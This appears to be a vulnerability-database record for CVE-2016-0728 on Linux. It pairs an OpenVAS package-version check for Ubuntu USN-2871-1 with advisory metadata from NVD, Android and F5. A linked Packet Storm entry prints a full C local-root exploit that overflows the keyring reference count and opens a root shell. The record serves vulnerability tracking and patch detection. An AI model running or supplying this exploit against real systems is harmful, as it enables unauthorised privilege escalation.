ID OPENVAS:1361412562310842603 Type openvas Reporter Copyright (C) 2016 Greenbone Networks GmbH Modified 2019-03-13T00:00:00
Description
The remote host is missing an update for the 'linux' package(s) announced via the referenced advisory.
###############################################################################
# OpenVAS Vulnerability Test
#
# Ubuntu Update for linux USN-2871-1
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
# Plugin registration: when the scanner loads the script with "description"
# set, only the metadata below is recorded and the script exits here, so the
# package checks further down never run in this phase.
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.842603");
script_version("$Revision: 14140 $");
script_tag(name:"last_modification", value:"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $");
script_tag(name:"creation_date", value:"2016-01-20 06:16:15 +0100 (Wed, 20 Jan 2016)");
# Session-keyring reference-counting flaw described in the "insight" tag
# below: local denial of service or possible code execution with
# administrative privileges, hence the local-access CVSS v2 vector.
script_cve_id("CVE-2016-0728");
script_tag(name:"cvss_base", value:"7.2");
script_tag(name:"cvss_base_vector", value:"AV:L/AC:L/Au:N/C:C/I:C/A:C");
# The finding rests on the installed package version (see "vuldetect"), not
# on any interaction with the keyring code itself.
script_tag(name:"qod_type", value:"package");
script_name("Ubuntu Update for linux USN-2871-1");
script_tag(name:"summary", value:"The remote host is missing an update for the 'linux'
package(s) announced via the referenced advisory.");
script_tag(name:"vuldetect", value:"Checks if a vulnerable version is present on the target host.");
script_tag(name:"insight", value:"Yevgeny Pats discovered that the session
keyring implementation in the Linux kernel did not properly reference count
when joining an existing session keyring. A local attacker could use this to
cause a denial of service (system crash) or possibly execute arbitrary code with
administrative privileges.");
# Scope is restricted to Ubuntu 15.04; the release key below enforces this
# before the detection body is reached.
script_tag(name:"affected", value:"linux on Ubuntu 15.04");
script_tag(name:"solution", value:"Please Install the Updated Packages.");
script_xref(name:"USN", value:"2871-1");
script_xref(name:"URL", value:"http://www.ubuntu.com/usn/usn-2871-1/");
script_tag(name:"solution_type", value:"VendorFix");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (C) 2016 Greenbone Networks GmbH");
script_family("Ubuntu Local Security Checks");
# Presumably gather-package-list.nasl populates the ssh/login/packages key
# consumed by the dpkg helpers below; the mandatory keys additionally require
# an SSH login and a release string matching UBUNTU15.04 (regex-anchored so
# that e.g. 15.04-derived strings with other separators do not match).
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/ubuntu_linux", "ssh/login/packages", re:"ssh/login/release=UBUNTU15\.04");
exit(0);
}
include("revisions-lib.inc");
include("pkg-lib-deb.inc");
# Detection phase: compare the installed kernel image packages against the
# fixed version from USN-2871-1. Nothing is reported unless the release
# string gathered over SSH is exactly UBUNTU15.04.
release = dpkg_get_ssh_release();
if(!release)
  exit(0);

res = "";

if(release == "UBUNTU15.04")
{
  # Kernel image flavours fixed in 3.19.0-47.53 for this release. They are
  # checked in order and the first vulnerable match ends the script.
  affected_pkgs = make_list("linux-image-3.19.0-47-generic",
                            "linux-image-3.19.0-47-generic-lpae",
                            "linux-image-3.19.0-47-lowlatency",
                            "linux-image-3.19.0-47-powerpc-e500mc",
                            "linux-image-3.19.0-47-powerpc-smp",
                            "linux-image-3.19.0-47-powerpc64-emb",
                            "linux-image-3.19.0-47-powerpc64-smp");

  foreach affected_pkg(affected_pkgs)
  {
    res = isdpkgvuln(pkg:affected_pkg, ver:"3.19.0-47.53", rls:"UBUNTU15.04");
    if(res != NULL)
    {
      # Installed version is below the fix: report the helper's details and stop.
      security_message(data:res);
      exit(0);
    }
  }

  # __pkg_match is set by the dpkg helper when one of the packages was found
  # installed; exit(99) is the package-check convention for "present but not
  # vulnerable", as opposed to exit(0) when none of the packages is installed.
  if(__pkg_match) exit(99);
  exit(0);
}
{"id": "OPENVAS:1361412562310842603", "type": "openvas", "bulletinFamily": "scanner", "title": "Ubuntu Update for linux USN-2871-1", "description": "The remote host is missing an update for the ", "published": "2016-01-20T00:00:00", "modified": "2019-03-13T00:00:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842603", "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "references": ["2871-1", "http://www.ubuntu.com/usn/usn-2871-1/"], "cvelist": ["CVE-2016-0728"], "lastseen": "2019-05-29T18:35:24", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "android", "idList": ["ANDROID:CVE-2016-0728"]}, {"type": "cve", "idList": ["CVE-2016-0728"]}, {"type": "f5", "idList": ["SOL01948202", "F5:K01948202"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:135330"]}, {"type": "exploitdb", "idList": ["EDB-ID:40003", "EDB-ID:39277"]}, {"type": "redhat", "idList": ["RHSA-2016:0065", "RHSA-2016:0068", "RHSA-2016:0064", "RHSA-2016:0103"]}, {"type": "threatpost", "idList": ["THREATPOST:C5F01C375D7DB776A2A5902570B2E5FD", "THREATPOST:3457E4B368AF24E94CB5545AC02382A8", "THREATPOST:45807D1856E34DEFF51A771D0E730AA3"]}, {"type": "ubuntu", "idList": ["USN-2872-3", "USN-2872-1", "USN-2871-1", "USN-2871-2", "USN-2872-2", "USN-2870-1", "USN-2870-2", "USN-2873-1"]}, {"type": "zdt", "idList": ["1337DAY-ID-25517", "1337DAY-ID-25516"]}, {"type": "suse", "idList": ["SUSE-SU-2016:0746-1", "SUSE-SU-2016:0745-1", "SUSE-SU-2016:0750-1", "SUSE-SU-2016:0186-1", "SUSE-SU-2016:0341-1", "SUSE-SU-2016:0205-1", "SUSE-SU-2016:0757-1", "SUSE-SU-2016:0753-1", "SUSE-SU-2016:0747-1", "SUSE-SU-2016:0756-1"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:3459535A8A480A3A2F164DB01F4CF994", "EXPLOITPACK:4CC02E891FC223E9BA1344151AC6958F"]}, {"type": "amazon", "idList": ["ALAS-2016-642"]}, {"type": "oraclelinux", "idList": ["ELSA-2016-0064", "ELSA-2016-0185", "ELSA-2016-3509", "ELSA-2016-3510"]}, 
{"type": "symantec", "idList": ["SMNTC-1349"]}, {"type": "centos", "idList": ["CESA-2016:0064"]}, {"type": "archlinux", "idList": ["ASA-201601-26", "ASA-201601-20"]}, {"type": "seebug", "idList": ["SSV:90673", "SSV:91603"]}, {"type": "thn", "idList": ["THN:2F321B0D3CF635D0F8D272948E9B31C9"]}, {"type": "cisa", "idList": ["CISA:FCB4B9C4CB605F6B805399E8D3B54A48"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310131199", "OPENVAS:1361412562310842606", "OPENVAS:1361412562310120632", "OPENVAS:1361412562310842612", "OPENVAS:1361412562310842611", "OPENVAS:1361412562310122854", "OPENVAS:1361412562310842608", "OPENVAS:1361412562310871546", "OPENVAS:1361412562310842609", "OPENVAS:1361412562310122851"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2016-0065.NASL", "CENTOS_RHSA-2016-0064.NASL", "UBUNTU_USN-2871-2.NASL", "ALA_ALAS-2016-642.NASL", "UBUNTU_USN-2873-1.NASL", "UBUNTU_USN-2872-1.NASL", "UBUNTU_USN-2872-3.NASL", "SUSE_SU-2016-0205-1.NASL", "ORACLELINUX_ELSA-2016-3509.NASL", "ORACLELINUX_ELSA-2016-3510.NASL"]}, {"type": "hp", "idList": ["HP:C05018265"]}, {"type": "fedora", "idList": ["FEDORA:A5C89601FC0F"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3448-1:C7742"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:B216B7A8351B0F6B0DD9F8038436A48C"]}], "modified": "2019-05-29T18:35:24", "rev": 2}, "score": {"value": 7.6, "vector": "NONE", "modified": "2019-05-29T18:35:24", "rev": 2}, "vulnersScore": 7.6}, "pluginID": "1361412562310842603", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-2871-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is 
distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842603\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-20 06:16:15 +0100 (Wed, 20 Jan 2016)\");\n script_cve_id(\"CVE-2016-0728\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-2871-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Yevgeny Pats discovered that the session\n keyring implementation in the Linux kernel did not properly reference count\n when joining an existing session keyring. 
A local attacker could use this to\n cause a denial of service (system crash) or possibly execute arbitrary code with\n administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 15.04\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2871-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2871-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU15\\.04\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU15.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.19.0-47-generic\", ver:\"3.19.0-47.53\", rls:\"UBUNTU15.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.19.0-47-generic-lpae\", ver:\"3.19.0-47.53\", rls:\"UBUNTU15.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.19.0-47-lowlatency\", ver:\"3.19.0-47.53\", rls:\"UBUNTU15.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.19.0-47-powerpc-e500mc\", ver:\"3.19.0-47.53\", rls:\"UBUNTU15.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.19.0-47-powerpc-smp\", ver:\"3.19.0-47.53\", rls:\"UBUNTU15.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.19.0-47-powerpc64-emb\", ver:\"3.19.0-47.53\", rls:\"UBUNTU15.04\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.19.0-47-powerpc64-smp\", ver:\"3.19.0-47.53\", rls:\"UBUNTU15.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "naslFamily": "Ubuntu Local Security Checks"}
{"android": [{"lastseen": "2020-12-24T13:21:13", "bulletinFamily": "software", "cvelist": ["CVE-2016-0728"], "description": "The join_session_keyring function in security/keys/process_keys.c in the Linux kernel before 4.4.1 mishandles object references in a certain error case, which allows local users to gain privileges or cause a denial of service (integer overflow and use-after-free) via crafted keyctl commands.", "edition": 2, "modified": "2019-07-29T00:00:00", "published": "2016-03-01T00:00:00", "id": "ANDROID:CVE-2016-0728", "href": "http://www.androidvulnerabilities.org/vulnerabilities/CVE-2016-0728.html", "title": "CVE-2016-0728", "type": "android", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2020-12-09T20:07:32", "description": "The join_session_keyring function in security/keys/process_keys.c in the Linux kernel before 4.4.1 mishandles object references in a certain error case, which allows local users to gain privileges or cause a denial of service (integer overflow and use-after-free) via crafted keyctl commands.\n<a href=\"http://cwe.mitre.org/data/definitions/190.html\">CWE-190: Integer Overflow or Wraparound</a> <br />\n\n<a href=\"http://cwe.mitre.org/data/definitions/416.html\">CWE-416: Use After Free</a>", "edition": 5, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-02-08T03:59:00", "title": "CVE-2016-0728", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, 
"cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0728"], "modified": "2017-11-10T02:29:00", "cpe": ["cpe:/o:google:android:6.0", "cpe:/o:google:android:5.1.0", "cpe:/o:google:android:4.2", "cpe:/o:google:android:4.1", "cpe:/o:google:android:5.0.2", "cpe:/a:hp:server_migration_pack:7.5", "cpe:/o:google:android:4.4.2", "cpe:/o:google:android:4.0", "cpe:/o:google:android:4.4.1", "cpe:/o:google:android:4.0.3", "cpe:/o:google:android:4.3", "cpe:/o:google:android:4.0.4", "cpe:/o:google:android:5.0", "cpe:/o:linux:linux_kernel:4.4", "cpe:/o:google:android:4.2.1", "cpe:/o:google:android:5.1.1", "cpe:/o:google:android:4.2.2", "cpe:/o:google:android:5.1", "cpe:/o:google:android:4.3.1", "cpe:/o:google:android:6.0.1", "cpe:/o:google:android:4.1.2", "cpe:/o:google:android:4.0.2", "cpe:/o:google:android:4.4.3", "cpe:/o:google:android:5.0.1", "cpe:/o:google:android:4.0.1", "cpe:/o:google:android:4.4"], "id": "CVE-2016-0728", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0728", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.4:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:5.1.0:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.1:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:hp:server_migration_pack:7.5:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.4:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.3:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.2:*:*:*:*:*:*:*", 
"cpe:2.3:o:google:android:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:5.1:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.4.1:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:4.0.2:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2020-04-06T22:40:01", "bulletinFamily": "software", "cvelist": ["CVE-2016-0728"], "description": "\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP AAM | None | 12.0.0 \n11.4.0 - 11.6.0 | Not vulnerable | None \nBIG-IP AFM | None | 12.0.0 \n11.3.0 - 11.6.0 | Not vulnerable | None \nBIG-IP Analytics | None | 12.0.0 \n11.0.0 - 11.6.0 | Not vulnerable | None \nBIG-IP APM | None | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP ASM | None | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP DNS | None | 12.0.0 | Not vulnerable | None \nBIG-IP Edge Gateway | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP GTM | None | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP Link Controller | None | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP PEM | None | 12.0.0 \n11.3.0 - 11.6.0 | Not vulnerable | 
None \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WebAccelerator | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nARX | None | 6.0.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | None | 3.0.0 - 3.1.1 | Not vulnerable | None \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | Not vulnerable | None \nBIG-IQ Cloud | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Device | None | 4.2.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Security | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None \nBIG-IQ Centralized Management | None | 4.6.0 | Not vulnerable | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable | None \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nF5 WebSafe* | None | 1.0.0 | Not vulnerable | None \nTraffix SDC | None | 4.0.0 \n3.3.2 - 3.5.1 | Not vulnerable | None \n \n*F5 WebSafe software is not affected by this vulnerability because the Linux kernel does not form part of the product. 
F5 recommends that customers upgrade the operating system used with the F5 WebSafe Dashboard using the standard OS tools to address CVE-2016-0728.\n\nNone\n\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2019-05-08T22:08:00", "published": "2016-01-23T02:26:00", "id": "F5:K01948202", "href": "https://support.f5.com/csp/article/K01948202", "title": "Linux kernel vulnerability CVE-2016-0728", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-09-26T17:23:22", "bulletinFamily": "software", "cvelist": ["CVE-2016-0728"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nNone\n\nSupplemental Information\n\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n", "modified": "2016-04-26T00:00:00", "published": "2016-01-22T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/k/01/sol01948202.html", "id": "SOL01948202", "title": "SOL01948202 - Linux kernel vulnerability CVE-2016-0728", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:13:52", "description": "", "published": "2016-01-20T00:00:00", "type": "packetstorm", "title": "Linux Kernel REFCOUNT Overflow / Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0728"], "modified": "2016-01-20T00:00:00", "id": "PACKETSTORM:135330", "href": "https://packetstormsecurity.com/files/135330/Linux-Kernel-REFCOUNT-Overflow-Use-After-Free.html", 
"sourceData": "`# Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings \n# Date: 19/1/2016 \n# Exploit Author: Perception Point Team \n# CVE : CVE-2016-0728 \n \n/* CVE-2016-0728 local root exploit \nmodified by Federico Bento to read kernel symbols from /proc/kallsyms \nprops to grsecurity/PaX for preventing this in so many ways \n \n$ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall \n$ ./cve_2016_072 PP_KEY */ \n \n#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n#include <sys/types.h> \n#include <keyutils.h> \n#include <unistd.h> \n#include <time.h> \n#include <unistd.h> \n \n#include <sys/ipc.h> \n#include <sys/msg.h> \n \ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); \ntypedef unsigned long __attribute__((regparm(3))) (* \n_prepare_kernel_cred)(unsigned long cred); \n_commit_creds commit_creds; \n_prepare_kernel_cred prepare_kernel_cred; \n \n#define STRUCT_LEN (0xb8 - 0x30) \n#define COMMIT_CREDS_ADDR (0xffffffff810bb050) \n#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff810bb370) \n \n \n \nstruct key_type { \nchar * name; \nsize_t datalen; \nvoid * vet_description; \nvoid * preparse; \nvoid * free_preparse; \nvoid * instantiate; \nvoid * update; \nvoid * match_preparse; \nvoid * match_free; \nvoid * revoke; \nvoid * destroy; \n}; \n \n/* thanks spender - Federico Bento */ \nstatic unsigned long get_kernel_sym(char *name) \n{ \nFILE *f; \nunsigned long addr; \nchar dummy; \nchar sname[256]; \nint ret; \n \nf = fopen(\"/proc/kallsyms\", \"r\"); \nif (f == NULL) { \nfprintf(stdout, \"Unable to obtain symbol listing!\\n\"); \nexit(0); \n} \n \nret = 0; \nwhile(ret != EOF) { \nret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname); \nif (ret == 0) { \nfscanf(f, \"%s\\n\", sname); \ncontinue; \n} \nif (!strcmp(name, sname)) { \nfprintf(stdout, \"[+] Resolved %s to %p\\n\", name, (void *)addr); \nfclose(f); \nreturn addr; \n} \n} \n \nfclose(f); \nreturn 0; \n} \n \nvoid 
userspace_revoke(void * key) { \ncommit_creds(prepare_kernel_cred(0)); \n} \n \nint main(int argc, const char *argv[]) { \nconst char *keyring_name; \nsize_t i = 0; \nunsigned long int l = 0x100000000/2; \nkey_serial_t serial = -1; \npid_t pid = -1; \nstruct key_type * my_key_type = NULL; \n \nstruct { \nlong mtype; \nchar mtext[STRUCT_LEN]; \n} msg = {0x4141414141414141, {0}}; \nint msqid; \n \nif (argc != 2) { \nputs(\"usage: ./keys <key_name>\"); \nreturn 1; \n} \n \nprintf(\"[+] uid=%d, euid=%d\\n\", getuid(), geteuid()); \ncommit_creds = (_commit_creds)get_kernel_sym(\"commit_creds\"); \nprepare_kernel_cred = \n(_prepare_kernel_cred)get_kernel_sym(\"prepare_kernel_cred\"); \nif(commit_creds == NULL || prepare_kernel_cred == NULL) { \ncommit_creds = (_commit_creds)COMMIT_CREDS_ADDR; \nprepare_kernel_cred = \n(_prepare_kernel_cred)PREPARE_KERNEL_CREDS_ADDR; \nif(commit_creds == (_commit_creds)0xffffffff810bb050 \n|| prepare_kernel_cred == (_prepare_kernel_cred)0xffffffff810bb370) \nputs(\"[-] You probably need to change the address of \ncommit_creds and prepare_kernel_cred in source\"); \n} \n \nmy_key_type = malloc(sizeof(*my_key_type)); \n \nmy_key_type->revoke = (void*)userspace_revoke; \nmemset(msg.mtext, 'A', sizeof(msg.mtext)); \n \n// key->uid \n*(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */ \n//key->perm \n*(int*)(&msg.mtext[64]) = 0x3f3f3f3f; \n \n//key->type \n*(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type; \n \nif ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) { \nperror(\"msgget\"); \nexit(1); \n} \n \nkeyring_name = argv[1]; \n \n/* Set the new session keyring before we start */ \n \nserial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name); \nif (serial < 0) { \nperror(\"keyctl\"); \nreturn -1; \n} \n \nif (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | \nKEY_GRP_ALL | KEY_OTH_ALL) < 0) { \nperror(\"keyctl\"); \nreturn -1; \n} \n \n \nputs(\"[+] Increfing...\"); \nfor (i = 1; i < 0xfffffffd; i++) { \nif (i 
== (0xffffffff - l)) { \nl = l/2; \nsleep(5); \n} \nif (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) { \nperror(\"[-] keyctl\"); \nreturn -1; \n} \n} \nsleep(5); \n/* here we are going to leak the last references to overflow */ \nfor (i=0; i<5; ++i) { \nif (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) { \nperror(\"[-] keyctl\"); \nreturn -1; \n} \n} \n \nputs(\"[+] Finished increfing\"); \nputs(\"[+] Forking...\"); \n/* allocate msg struct in the kernel rewriting the freed keyring \nobject */ \nfor (i=0; i<64; i++) { \npid = fork(); \nif (pid == -1) { \nperror(\"[-] fork\"); \nreturn -1; \n} \n \nif (pid == 0) { \nsleep(2); \nif ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) { \nperror(\"[-] msgget\"); \nexit(1); \n} \nfor (i = 0; i < 64; i++) { \nif (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) { \nperror(\"[-] msgsnd\"); \nexit(1); \n} \n} \nsleep(-1); \nexit(1); \n} \n} \n \nputs(\"[+] Finished forking\"); \nsleep(5); \n \n/* call userspace_revoke from kernel */ \nputs(\"[+] Caling revoke...\"); \nif (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) { \nperror(\"[+] keyctl_revoke\"); \n} \n \nprintf(\"uid=%d, euid=%d\\n\", getuid(), geteuid()); \nexecl(\"/bin/sh\", \"/bin/sh\", NULL); \n \nreturn 0; \n} \n \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/135330/linuxrefcount-uaf.txt"}], "exploitdb": [{"lastseen": "2016-06-22T17:14:07", "description": "Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (2). CVE-2016-0728. 
